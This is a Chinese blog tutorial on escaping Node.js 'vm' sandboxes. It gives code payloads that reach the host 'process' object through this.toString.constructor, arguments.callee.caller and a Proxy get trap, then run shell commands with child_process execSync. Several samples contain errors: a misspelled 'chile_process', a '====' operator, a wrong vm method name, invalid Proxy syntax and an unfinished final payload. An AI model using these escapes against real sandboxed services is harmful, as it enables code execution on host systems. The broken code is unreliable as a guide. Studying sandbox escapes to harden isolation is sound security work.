安全基础 --- nodejs沙箱逃逸

已于 2023-09-22 11:12:24 修改
阅读量4.2k 收藏 2
点赞数
分类专栏: 安全攻击 文章标签: 安全 前端 javascript 开发语言 网络
于 2023-09-22 11:09:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62443409/article/details/133135255
版权

nodejs沙箱逃逸

沙箱绕过原理:沙箱内部找到一个沙箱外部的对象,借助这个对象内的属性即可获得沙箱外的函数,进而绕过沙箱

  • 前提:使用vm模块,实现沙箱逃逸环境。(vm模式是nodejs中内置的模块,是nodejs提供给使用者的隔离环境)
  • 目的:拿到process模块

实现沙箱逃逸,拿到目标

(1)Function构造函数实现

源代码:
const vm = require('vm');
// 一代沙箱,不安全,有逃逸漏洞
const script = `m + n`;
// 沙箱内引入脚本执行命令
const sandbox = {m:1,n:2};
// 为沙箱中传入对象
const context = new vm.createContext(sandbox);
// 创建沙箱的上下文环境,将沙箱对象传入
const res = vm.runContext(script,sandbox);
// 通过script参数进行沙箱内部的执行
console.log(res);
引入Function():

this来引入当前上下文里没有的模块,绕过这个隔离环境

const script = `
    const process = this.toString.constructor('return process')()
    process.mainModule.require('child_process').execSync('whoami').toString()
`;
// this.toString获取到一个函数对象,this.toString.constructor获取到函数对象的构造器,即Function()这个构造函数,构造器中传入字符串类型的代码
// process模块调用mainModule,require用来导入子类的process模块,然后使用execSync执行命令

问题1:为什么不能使用{}.toString.constructor('return process')(),却使用this?

{} 是在沙盒内部的一个对象,而this是在沙盒外的对象(注入进来的)。沙盒内的 {} 无法获取process,因为其本身就无process

问题2:m和n也是沙盒外的对象,为什么不能用m.toString.constructor('return process')()实现?

因为 primitive types,数字、字符串、布尔这些都是 primitive types ,他们传递的是值,沙盒内使用的m和外部的m不是同一个m,无法利用。

const sandbox = {m:[],n:{},x:/regexp/}
// 修改后就可利用了
实现:
const vm = require('vm');
const script = `
    const process = this.toString.constructor('return process')()
    process.mainModule.require('child_process').execSync('whoami').toString()
`;
const sandbox = {m:[],n:{},x:/regexp/};
const context = new vm.createContext(sandbox);
const res = vm.runInContext(script,context);
console.log(res);

(2)argument.callee.caller实现

源代码:

(在1的基础上,进行修改,使得this无法实现)

const vm = require('vm');
const script = `..`;
const sandbox = Object.create(null);
// 上下文无对象,this指向为空
const res = vm.runInContext(script,context);

// Object.create(null)指向了纯净的空对象,无原型链,无this环境,无任何方式方法。
// 在js中,this指向window;nodejs中的this指向global
分析:
const sandbox = Object.create(null);

function greet(){
    console.log(this);
}
// 此时的this是在sandbox下调用,此时的this指向null
sandbox.greet = greet;
// 将greet赋值给sandbox中的greet属性
sandbox.greet();
// 实现调用

利用arguments.callee.caller实现

arguments // js中的callee caller 是已经被废弃的属性

//(1) 写个函数实现callee
const factorial = function(n) {
    if (n === 0 || n ==== 1){
        return 1;
    }else{
        return n * arguments.callee(n-1);
// 实际上是递归进行传递,arguments.callee(n-1) === factorial(n-1)
    }
};
// 1 2 3 5 8  ---- 斐波那契数列
console.log(factorial(5)); // 120
// 5 * factorial(4)
// 5 * 4 * factorial(3)
// 5 * 4 * 3 * factorial(2)
// 5 * 4 * 3 * 2 * 1

// (2) 实现caller
function outer() {
    inner();
}

function inner() {
    // 函数的父类,谁调用了你,会指向某个调用你的函数。此处打印出的是outer()
    console.log(arguments.caller);
}
// 在inner中,arguments.caller是被outer调用
outer();
// undefined

arguments.callee.caller --- 某个调用你的方法

实现:
const vm = require('vm');
const script = `(() => {
    const a = {}
    a.toString = function() {
    const cc = arguments.callee.caller;
    const p = (cc.constructor('return process'))();
    return p.mainModule.require('chile_process').execSync('whoami').toString();
    }
    return a;
})()`;
// arguments.callee是函数本身,就是function(),加上.caller指向toString方法
// toString方法指向外部,在外部通过拼接字符串进行调用
// 最终toString方法指向沙箱外部
const sandbox = Object.create(null);
const context = new vm.createContext(sandbox);
const res = vm.runInContext(script,context);
console.log('hello' + res); // 通过hello触发
// 在js中,某个东西和字符串拼接,最终会变成一个字符串。'hello' + res --- string(自动调用toString方法)

// 相当于在外部通过hello进行字符串连接,连接了一个函数,最终调用toString方法,这个toString方法就会触发内部的a,触发a的toString方法,利用这个toString和constructor拿到内部的Function,最后返回process对象

(3)利用ex6的Proxy(代理模式)来劫持外部的get操作

Proxy可理解为:在目标对象前架设一层“拦截”,外界对该对象的访问,都必须先通过这层拦截,相当于对外界的访问进行过滤和改写。

例:拦截读取属性行为
var proxy = new Proxy(){
    get:function(target,proKey){
        return 35;
    }
}
proxy.time  // 35
proxy.name  // 35
proxy.title // 35
实现:
const vm = require('vm');
const script = `(() => {
    const a = new Proxy({},{
        get:function(){
            const cc = arguments.callee.caller;
            cc.constructor('return process')
        }
    })
})()`;
// 定义代理模式,将代理模式定义为空对象,这个空对象有get方法
const sandbox = Object.create(null);
const context = new vm.createContext(sandbox);
const res = vm.runInContext(script,context);
console.log(res.xxx);
雨天_
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
aliyun-iot-demo-nodejs:Nodejs模拟硬件设备接入阿里云IoT物联网套件,基础版demo+高级版demo
05-18
1. 阿里云IoT物联网套件-基础版产品开发实战 1.1 场景:办公室中已经布点的温湿度计设备上报数据到钉钉群机器人。 思路:温湿度计通过MQTT协议连接到IoT套件,规则引擎针对数据上报Topic配置转发到函数计算...
google-search-results-nodejs:Google搜索结果Node.JS
05-02
NodeJS模块旨在使用抓取和解析Google,Bing和百度的结果。 该Ruby Gem旨在使用抓取并解析Google结果。 提供以下服务: SerpApi提供了一个,可帮助您快速入门。 该Ruby Gem旨在使用抓取并解析Google结果。 提供...
Nodejs沙箱逃逸
m0_66022305的博客
08-03 241
我们在沙盒中定义一个函数并返回,在沙盒外这个函数被调用,那么此时的arguments.callee.caller就是沙盒外的这个调用者,我们再通过这个调用者拿到它的constructor等属性,就可以绕过沙箱了。在 JavaScript 中,this 关键字的值取决于函数的执行上下文。因为primitive types,数字、字符串、布尔等这些都是primitive types,他们的传递其实传递的是值而不是引用,所以在沙盒内虽然你也是使用的m,但是这个m和外部那个m已经不是一个m了,所以也是无法利用的。
Nodejs沙箱绕过
最新发布
qq_68163788的博客
11-10 1276
Node.js沙箱逃逸是指攻击者通过利用Node.js沙箱中的漏洞,成功地从沙箱环境中逃脱,并在主机上执行恶意代码。这种攻击方式通常是通过利用Node.js沙箱中的一些不安全的API或者漏洞来实现的。 例如,攻击者可以通过在Node.js沙箱中使用eval()函数来执行任意的JavaScript代码,从而逃脱沙箱环境。另外,攻击者还可以利用Node.js沙箱中的child_process模块来执行系统命令,从而获取系统权限。 为了防止Node.js沙箱逃逸攻击,开发人员应该遵循安全编程规范,并使用最新版本
Nodejs沙箱逃逸--总结
m0_68976043的博客
08-19 3127
每一个包都有一个自己的上下文,包之间的作用域是互相隔离不互通的,也就是说就算我在y1.js中require了y2.js,那么我在y1.js中也无法直接调用y2.js中的变量和函数,举个例子。在Web端(浏览器),发挥作用的一般是JavaScript,学过JavaScript的师傅应该都知道我们打开浏览器的窗口是JavaScript中最大的对象。我们都知道函数内和函数外是两个作用域,不过当在函数中的作用域想要使用函数外的变量时,要通过形参来传递,当参数过多时这种方法就变的麻烦起来了。
node-modbus-tcp:NodeJS Modbus TCPIP
05-02
Modbus TCP / IP流 这是一个非常简单的模块,使用NodeJS Streams2读取Modbus TCP数据并将其转换为JSON,反之亦然。安装如果您只是开始或尝试使用该库,建议您尝试使用 。 它更完整(它支持所有标准功能代码),并且...
influxdb-nodejs:简单的influxdb客户端
05-17
influxdb-nodejs Node.js客户端。 安装 $ npm install influxdb - nodejs 例子 查看目录以获取工作示例。 原料药 新客户 // no auth const Influx = require ( 'influxdb-nodejs' ) ; const client = new Influx ...
node-app-practice:nodejs日常练习模版
02-12
:milky_way: 节点实践学习资料参考 continuously updated...Added some daily ... In Nodejs native HTTP module, request body is to be accepted and resolved based on flow.Body -parser is a middleware for HTT
mongo-express 远程代码执行漏洞(CVE-2019-10758)
qq_50854662的博客
03-01 755
前言 mongo-express是一款mongodb的第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass),则可以执行任意node.js代码。 影响版本 mongo-express, 0.54.0 之前的版本 环境搭建 cd vulhub/mongo-express/CVE-2019-10758 docker-compose up -d 环境启动后,访问http://y...
node.js--vm沙箱逃逸初探
m0_62422842的博客
01-04 2028
前几天遇到一个考察vm沙箱逃逸的题目,由于这个点是第一次听说,所以就花时间了解了解什么是沙箱逃逸。此篇文章是对于自己初学vm沙箱逃逸的学习记录,若记录知识有误,欢迎师傅们指正。就只针对于node.js而言,沙箱和docker容器其实是差不多的,都是将程序与程序之间,程序与主机之间互相分隔开,但是沙箱是为了隔离有害程序的,避免影响到主机环境。为什么node.js语言要引入沙箱,这就要说说js语言中的作用域(也叫上下文)。------->输出undefined-------->输出100。
Node.js沙箱逃逸
shawdow_bug的博客
09-02 1802
什么是沙箱(sandbox) 在计算机安全性方面,沙箱(沙盒、sanbox)是分离运行程序的安全机制,提供一个隔离环境以运行程序。通常情况下,在沙箱环境下运行的程序访问计算机资源会受到限制或者禁止,资源包括内存、网络访问、主机系统等等。 沙箱通常用于执行不受信任的程序或代码,例如用户输入、第三方模块等等。其目的为了减少或者避免软件漏洞对计算机造成破坏的风险。 沙箱技术的实现 & node.js 沙箱技术按照设定的安全策略,限制不可信程序对系统资源的使用来实现,那么就要在访问系统资源之前将程序的系统调
语言-C#】进程处理
少莫千华
03-03 612
using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Windows.Forms; using System.Dia
[HITCON 2016]Leaking-nodejsVM沙箱逃逸
cjdgg的博客
08-19 647
[HITCON 2016]Leaking 最近想学下nodejs相关的题目,所以去buu上又找了一道来做 进入题目后如上图所示,直接给出了源代码,老样子,拿出之前收藏的nodejs相关安全问题来对比着看看,我发现这里用了VM沙箱,那最有可能考的就是VM逃逸了 emem由于之前没做过,说实话,光看这个完全不知道该怎么做,还是老实找个大佬的WP来看看吧 那我们先来分析下代码,下面这段代码是整道题的核心 /* Orange is so kind so he put the flag here. But
几道nodejs题目的分析
stepone4ward的博客
04-01 2366
三道原型链污染,一道拆分请求攻击
浅谈NPM,vm,vm2,Node.js沙盒逃逸
m0_62063669的博客
06-24 3040
浅谈NPM,vm,vm2,Node.js沙盒逃逸( npm是用 JavaScript 写的,运行在 Node.js 上,Node.js 内置了 npm,npm 的发展是跟 Node.js 的发展相辅相成的。)简单来说, Node.js 就是运行在服务端的JavaScript,npm是随同Node.js一起安装的包管理工具,通过命令从npm服务器下载别人编写的第三方工具到本地使用。但是VM不安全,能轻易地获取到了主程序的全局对象 process,最终控制主程序!因此VM2诞生,解决了VM的安全问题。 ..
Node.js8.0沙箱逃逸问题
qq_53099802的博客
06-02 361
Node.js8.0的buffer函数读取内存操作。
有关沙盒逃逸的两道题目
playmaker的博客
06-11 1092
有关沙盒逃逸的两道题目 1.BCTF-2017 Monkey 拿到题目给了一个js文件,是一个模拟终端的程序。输入os.system(’/bin/sh’),即可拿到shell. 2.CUIT-2017 这题就没上一题那么容易。 输入os.system(’/bin/sh’)函数被检测出,应该是启用了字符串过滤 ''和.都被过滤,但是system没有过滤,此时我们可以使用getattr 来进行g...
nodejs沙箱逃逸
09-11
node.js沙箱逃逸是指攻击者利用特定的漏洞或技术手段,成功越过node.js沙箱限制,实现对主机环境的非法操作或访问。在node.js中,沙箱被用来隔离有害程序,防止其影响到主机环境。通过沙箱,可以将程序与程序之间、程序与主机之间互相分隔开。 具体来说,沙箱逃逸利用的是node.js中的漏洞或不当的配置,使攻击者能够绕过沙箱的限制,执行恶意代码或访问敏感资源。攻击者可能通过构造精心设计的输入,触发沙箱漏洞,从而获得对主机环境的不受限制的访问权限。 为了防止沙箱逃逸,需要及时更新node.js版本,以修复已知的漏洞。此外,也可以采取其他安全措施,如限制代码的执行权限,限制访问敏感资源的权限等。同时,编写安全的代码也是非常重要的,避免在代码中存在漏洞可供攻击者利用。 总结来说,node.js沙箱逃逸是指攻击者利用漏洞或技术手段,成功绕过node.js的沙箱限制,实现对主机环境的非法操作或访问。为了防止沙箱逃逸,需要及时更新node.js版本,采取其他安全措施,并编写安全的代码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

雨天_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值